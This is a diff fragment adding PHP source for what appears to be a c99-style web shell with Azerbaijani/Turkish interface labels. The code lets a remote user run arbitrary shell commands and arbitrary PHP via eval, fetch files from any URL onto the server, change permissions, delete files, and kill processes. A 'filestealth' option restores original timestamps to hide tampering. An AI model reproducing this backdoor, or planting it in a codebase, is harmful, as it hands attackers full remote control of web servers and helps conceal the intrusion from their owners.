+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Ara!\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Ad&#305;</b>";
+   $row[] = "<b>hecmi</b>";
+   $row[] = "<b>D&#601;yi&#351;dirme Tarihi</b>";
+   if (!$win)
+  {$row[] = "<b>Grup</b>";}
+   $row[] = "<b>icaz&#601;l&#601;r</b>";
+   $row[] = "<b>Aktif</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[M&#601;lumat]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[D&#601;yi&#351;dir]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Y&uuml;kl&#601;]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#330000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Hamisini Sec\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Secilenleri Burax\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Yapistir\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">Islet:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Sil</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">icaz&#601;l&#601;ri Duzenle</option>";
+    echo "<option value=cut".($dspact == "cut"?" selected":"").">Kes!</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Kopyala!</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Kes!</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Kopyala!</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Ok!\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Islemci M&#601;lumatleri:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>php Kod Calistir</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Tamam\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
